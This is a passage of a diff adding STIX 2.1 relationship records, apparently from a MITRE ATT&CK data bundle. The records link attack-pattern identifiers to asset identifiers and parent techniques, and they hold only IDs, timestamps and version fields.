"x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c79a20d2-86a3-481a-a0f9-0554daed63bd", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c79a7b35-3168-4dfb-bd5f-b0ee95b880db", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c7ab9f46-f60e-4156-b56f-415e39bc7dd9", + "created": "2020-03-02T19:24:01.041Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", + "target_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c7e84935-a1d9-4597-8b8b-79565f497b61", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c7f0c5d7-4595-4f18-ad77-b2eece3177d7", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c8019115-38f0-4949-b7c6-331898b2cc83", + "created": "2020-02-21T20:35:49.249Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--2e0dd10b-676d-4964-acd0-8a404c92b044", + "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c80af376-6fe2-4e00-bcb1-96baed43ca3b", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c81077aa-3545-41de-a22a-dfc9f398b65f", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c8222300-6c5e-42d6-ae67-3595407b89fd", + "created": "2024-04-09T20:54:39.801Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:54:39.801Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c839a3a8-dc0c-4b58-9ee3-8138ea83e05e", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c8481494-b0a2-4cd1-be3c-e043daa11ae0", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c848d2d3-ded6-45a0-b942-3763bbd10d5c", + "created": "2020-02-26T17:46:13.236Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c8569b1a-8b96-4fb0-8b8a-ce7c56257cbf", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c85730d3-5154-412c-808a-1e70f54a46bd", + "created": "2024-06-26T14:51:08.429Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:51:08.429Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c88d4c6b-0183-4c6a-8383-d6e211561089", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c8954926-8fe9-4bdf-bddf-3a4bafd4aad4", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c89d6862-59d0-4edf-8632-c070fde71ea7", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c8ad1c12-66b1-4146-b9a8-f3261719a34f", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e0033c16-a07e-48aa-8204-7c3ca669998c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c8e5d0e1-9d60-4f10-984e-735f6d7ce91f", + "created": "2020-01-17T19:13:50.516Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "target_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c8f5da02-bcbc-4455-8fb4-490389688e62", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c9005a9a-c6c5-4044-82d7-f108b2e72f93", + "created": "2020-02-12T14:09:53.660Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "target_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c9081b99-ad93-4fc4-9bcc-cdea38d15366", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c92a9e62-b098-4f66-aeb1-fce243eca00f", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c92cd5fe-94d6-45ec-9474-198162d145ff", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c93632b4-0a7a-4492-a0e2-d57cffe7ff64", + "created": "2020-07-07T16:44:26.688Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2020-10-27T14:49:39.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", + "target_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c93c274c-d55f-423b-93e8-e1ceef8f3d05", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c93ca587-24fe-44d0-951e-30d82b9e6198", + "created": "2020-02-18T18:03:37.714Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819", + "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c95850f4-4616-435c-b237-f1985833d40e", + "created": "2023-09-29T16:29:39.918Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:29:39.918Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c973e69a-f07c-470b-a04a-82cd91216c26", + "created": "2022-01-13T20:02:28.626Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-05-24T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48", + "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c9a1bcec-9a4d-4693-accb-5a6f67b857f6", + "created": "2020-02-12T18:55:24.841Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3", + "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c9ae024e-12b3-4a43-9564-4136d8186c53", + "created": "2024-06-27T08:55:29.342Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:55:29.342Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c9d0ae9d-40ae-479e-b03d-ef4a7a8465f9", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c9dd4423-b9ef-4d5a-82d3-27f5eaeceafb", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c9ddf587-63c2-4fae-a6c5-8844fff045a0", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c9e2fc8d-da60-4cea-8b0e-63617bab710a", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c9fb4adb-8064-426a-838d-c93674fb380b", + "created": "2023-09-29T18:44:38.035Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:44:38.035Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca046eed-8641-4800-a348-11938e97adb9", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca118565-cd52-43ab-ae7d-6aadda03b5ee", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ca128cd7-2beb-4d90-a88c-73889a2209ed", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": 